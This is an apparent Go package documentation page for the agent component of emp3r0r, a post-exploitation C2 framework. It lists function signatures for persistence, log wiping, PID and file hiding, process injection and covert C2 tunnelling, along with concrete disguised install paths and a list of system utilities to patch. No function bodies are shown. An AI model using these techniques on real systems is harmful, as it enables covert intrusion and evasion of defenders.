agent

package

v0.0.0-...-c30bc72 Latest Latest Go to latest Published: Apr 21, 2024 License: MIT Imports: 48 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/jm33-m0/emp3r0r

Links

Open Source Insights

Documentation ¶

Rendered for

Index ¶

Variables
func AddCronJob(job string) error
func AddNeededLib(elf_file, lib_file string) (err error)
func ApplyRuntimeConfig() (err error)
func BroadcastMsg(msg, dst string) (err error)
func BroadcastServer(ctx context.Context, cancel context.CancelFunc, port string) (err error)
func C2CommandsHandler(cmdSlice []string) (out string)
func CCMsgTun(ctx context.Context, cancel context.CancelFunc) (err error)
func CheckAccount(username string) (accountInfo map[string]string, err error)
func CheckAgentProcess() *emp3r0r_data.AgentProcess
func CheckContainer() string
func CheckIn() (err error)
func CleanAllByKeyword(keyword string) (err error)
func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo
func ConnectCC(url string) (conn *h2conn.Conn, ctx context.Context, cancel context.CancelFunc, err error)
func CopyProcExeTo(pid int, dest_path string) (err error)
func CopySelfTo(dest_file string) (err error)
func DownloadViaCC(file_to_download, path string) (data []byte, err error)
func ExtractBash() error
func FixELF(elf_path string) (err error)
func GDBInjectLoader(pid int) error
func GDBInjectSharedLib(pid int) error
func GetKernelVersion() (uname string)
func GetLibc(pid int) (path string, addr, offset int64, err error)
func GetRoot() error
func GetSymFromLibc(pid int, sym string) (addr int64, err error)
func HasRoot() bool
func HidePIDs() (err error)
func InjectLoader(pid int) error
func InjectSharedLib(so_path string, pid int) (err error)
func InjectorHandler(pid int, method string) (err error)
func IsAgentAlive(c net.Conn) bool
func IsAgentRunningPID() (bool, int)
func IsCCOnline(proxy string) bool
func IsELF(file string) bool
func IsStaticELF(file_path string) bool
func KCPClient()
func PersistAllInOne() (final_err error)
func PortFwd(addr, sessionID, protocol string, reverse bool, timeout int) (err error)
func ProcUID(pid int) string
func RunShellScript(scriptBytes []byte) (output string, err error)
func SSHD(shell, port string, args []string) (err error)
func Screenshot() (path string, err error)
func Send2CC(data *emp3r0r_data.MsgTunData) error
func SetPath()
func SetProcessName(name string)
func SftpHandler(sess ssh.Session)
func ShadowsocksC2Client()
func ShellcodeInjector(shellcode *string, pid int) error
func Socks5Proxy(op string, addr string) (err error)
func StartBroadcast(start_socks5 bool, ctx context.Context, cancel context.CancelFunc)
func Upgrade(checksum string) (out string)
func VaccineHandler() (out string)
type OSInfo
- func GetOSInfo() *OSInfo
type PortFwdSession

Constants ¶

This section is empty.

Variables ¶

View Source

var (
	// PersistMethods CC calls one of these methods to get persistence, or all of them at once
	// look at emp3r0r_data.PersistMethods too
	PersistMethods = map[string]func() error{
		"profiles": profiles,
		"cron":     cronJob,
		"patcher":  patcher,
	}

	// Hidden_PIDs list of hidden files/pids
	// see loader.c
	Hidden_PIDs  = "/usr/share/at/batch-job.at"
	Hidden_Files = "/usr/share/at/daily-job.at"

	// Patched_List list of patched sys utils
	Patched_List = []string{
		"/usr/bin/ls",
		"/usr/bin/dir",
		"/usr/bin/ps",
		"/usr/bin/pstree",
		"/usr/bin/netstat",
		"/usr/sbin/sshd",
		"/usr/bin/bash",
		"/usr/bin/sh",
		"/usr/bin/ss",
	}

	// EmpLocations all possible locations
	EmpLocations = []string{

		"/env",
		"/usr/bin/x",
		"/usr/bin/.env",
		"/usr/local/bin/env",
		"/bin/.env",
		"/usr/share/man/man1/arch.gz",
		"/usr/share/man/man1/ls.1.gz",
		"/usr/share/man/man1/arch.5.gz",
	}

	EmpLocationsNoRoot = []string{

		"/tmp/.env",
		"/dev/shm/.env",
		fmt.Sprintf("%s/.wget-hst",
			os.Getenv("HOME")),
		fmt.Sprintf("%s/.less-hist",
			os.Getenv("HOME")),
		fmt.Sprintf("%s/.sudo_as_admin_successful",
			os.Getenv("HOME")),
		fmt.Sprintf("%s/.env",
			os.Getenv("HOME")),
		fmt.Sprintf("%s/.pam",
			os.Getenv("HOME")),
	}
)

View Source

var (
	HandShakes      = make(map[string]bool)
	HandShakesMutex = &sync.RWMutex{}
)

HandShakes record each hello message and C2's reply

View Source

var (
	// PortFwds manage port mappings
	PortFwds = make(map[string]*PortFwdSession)

	// PortFwdsMutex lock map
	PortFwdsMutex = &sync.Mutex{}
)

View Source

var ReverseConns = make(map[string]context.CancelFunc)

ReverseConns record ssh reverse proxy sessions

View Source

var RuntimeConfig = &emp3r0r_data.Config{}

View Source

var SS_Ctx, SS_Cancel = context.WithCancel(context.Background())

Functions ¶

func AddCronJob ¶

func AddCronJob(job string) error

AddCronJob add a cron job without terminal this creates a cron job for whoever runs the function

func AddNeededLib ¶

func AddNeededLib(elf_file, lib_file string) (err error)

AddNeededLib: Add a needed library to an ELF file, lib_file needs to be full path

func ApplyRuntimeConfig ¶

func ApplyRuntimeConfig() (err error)

func BroadcastMsg ¶

func BroadcastMsg(msg, dst string) (err error)

BroadcastMsg send a broadcast message on a network

func BroadcastServer ¶

func BroadcastServer(ctx context.Context, cancel context.CancelFunc, port string) (err error)

BroadcastServer listen on a UDP port for broadcasts wait for some other agents to announce their internet proxy

func C2CommandsHandler ¶

func C2CommandsHandler(cmdSlice []string) (out string)

func CCMsgTun ¶

func CCMsgTun(ctx context.Context, cancel context.CancelFunc) (err error)

CCMsgTun use the connection (CCConn)

func CheckAccount ¶

func CheckAccount(username string) (accountInfo map[string]string, err error)

CheckAccount : check account info by parsing /etc/passwd

func CheckAgentProcess ¶

func CheckAgentProcess() *emp3r0r_data.AgentProcess

CheckAgentProcess fill up info.emp3r0r_data.AgentProcess

func CheckContainer ¶

func CheckContainer() string

func CheckIn ¶

func CheckIn() (err error)

CheckIn poll CC server and report its system info

func CleanAllByKeyword ¶

func CleanAllByKeyword(keyword string) (err error)

CleanAllByKeyword delete any entries containing keyword in ALL known log files

func CollectSystemInfo ¶

func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo

CollectSystemInfo build system info object

func ConnectCC ¶

func ConnectCC(url string) (conn *h2conn.Conn, ctx context.Context, cancel context.CancelFunc, err error)

ConnectCC connect to CC with h2conn

func CopyProcExeTo ¶

func CopyProcExeTo(pid int, dest_path string) (err error)

CopyProcExeTo copy executable of an process to dest_path

func CopySelfTo ¶

func CopySelfTo(dest_file string) (err error)

Copy current executable to a new location

func DownloadViaCC ¶

func DownloadViaCC(file_to_download, path string) (data []byte, err error)

DownloadViaCC download via EmpHTTPClient if path is empty, return []data instead

func ExtractBash ¶

func ExtractBash() error

ExtractBash extract embedded bash binary and configure our bash shell

func FixELF ¶

func FixELF(elf_path string) (err error)

FixELF: Replace ld and add rpath

func GDBInjectLoader ¶

func GDBInjectLoader(pid int) error

Inject loader.so into any process

func GDBInjectSharedLib ¶

func GDBInjectSharedLib(pid int) error

Inject shared lib into any process

func GetKernelVersion ¶

func GetKernelVersion() (uname string)

func GetLibc ¶

func GetLibc(pid int) (path string, addr, offset int64, err error)

GetLibc get base address, ASLR offset value, and path of libc by parsing /proc/pid/maps

func GetRoot ¶

func GetRoot() error

func GetSymFromLibc ¶

func GetSymFromLibc(pid int, sym string) (addr int64, err error)

GetSymFromLibc: Get pointer to a libc function that is currently loaded in target process, ASLR-proof

func HasRoot ¶

func HasRoot() bool

func HidePIDs ¶

func HidePIDs() (err error)

func InjectLoader ¶

func InjectLoader(pid int) error

InjectLoader inject loader.so into any process, using shellcode locate __libc_dlopen_mode in memory then use it to load SO

func InjectSharedLib ¶

func InjectSharedLib(so_path string, pid int) (err error)

inject a shared library into target process

func InjectorHandler ¶

func InjectorHandler(pid int, method string) (err error)

InjectorHandler handles `injector` module

func IsAgentAlive ¶

func IsAgentAlive(c net.Conn) bool

is the agent alive? connect to emp3r0r_data.SocketName, send a message, see if we get a reply

func IsAgentRunningPID ¶

func IsAgentRunningPID() (bool, int)

IsAgentRunningPID is there any emp3r0r agent already running?

func IsCCOnline ¶

func IsCCOnline(proxy string) bool

IsCCOnline check RuntimeConfig.CCIndicator

func IsELF ¶

func IsELF(file string) bool

IsELF: Check if a file is ELF

func IsStaticELF ¶

func IsStaticELF(file_path string) bool

func KCPClient ¶

func KCPClient()

Connect to C2 KCP server, forward Shadowsocks traffic

func PersistAllInOne ¶

func PersistAllInOne() (final_err error)

PersistAllInOne run all persistence method at once

func PortFwd ¶

func PortFwd(addr, sessionID, protocol string, reverse bool, timeout int) (err error)

PortFwd port mapping, receive request data then send it to target port on remote address addr: when reversed, addr should be port

func ProcUID ¶

func ProcUID(pid int) string

ProcUID get euid of a process

func RunShellScript ¶

func RunShellScript(scriptBytes []byte) (output string, err error)

RunShellScript runs a bash script on target

func SSHD ¶

func SSHD(shell, port string, args []string) (err error)

func Screenshot ¶

func Screenshot() (path string, err error)

Screenshot take a screenshot returns path of taken screenshot

func Send2CC ¶

func Send2CC(data *emp3r0r_data.MsgTunData) error

Send2CC send TunData to CC

func SetPath ¶

func SetPath()

SetPath get current PATH variable and append it with common paths, then remove duplicates

func SetProcessName ¶

func SetProcessName(name string)

SetProcessName rename agent process by modifying its argv, all cmdline args are dropped

func SftpHandler ¶

func SftpHandler(sess ssh.Session)

SftpHandler handler for SFTP subsystem

func ShadowsocksC2Client ¶

func ShadowsocksC2Client()

Start ShadowsocksC2Client client, you get a SOCKS5 proxy server at *:Runtime.ShadowsocksPort This proxy server is responsible for encapsulating C2 traffic

func ShellcodeInjector ¶

func ShellcodeInjector(shellcode *string, pid int) error

ShellcodeInjector inject shellcode to arbitrary running process target process will be restored after shellcode has done its job

func Socks5Proxy ¶

func Socks5Proxy(op string, addr string) (err error)

Socks5Proxy sock5 proxy server on agent, listening on addr op: on/off

func StartBroadcast ¶

func StartBroadcast(start_socks5 bool, ctx context.Context, cancel context.CancelFunc)

func Upgrade ¶

func Upgrade(checksum string) (out string)

func VaccineHandler ¶

func VaccineHandler() (out string)

Types ¶

type OSInfo ¶

type OSInfo struct {
	Name         string `json:"name,omitempty"`
	Vendor       string `json:"vendor,omitempty"`
	Version      string `json:"version,omitempty"`
	Release      string `json:"release,omitempty"`
	Architecture string `json:"architecture,omitempty"`
	Kernel       string `json:"kernel,omitempty"`
}

OSInfo information.

func GetOSInfo ¶

func GetOSInfo() *OSInfo

type PortFwdSession ¶

type PortFwdSession struct {
	Addr   string // is a listener when `reverse` is set, a dialer when used normally
	Conn   *h2conn.Conn
	Ctx    context.Context
	Cancel context.CancelFunc
}

PortFwdSession manage a port fwd session

Source Files ¶

View all Source files

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL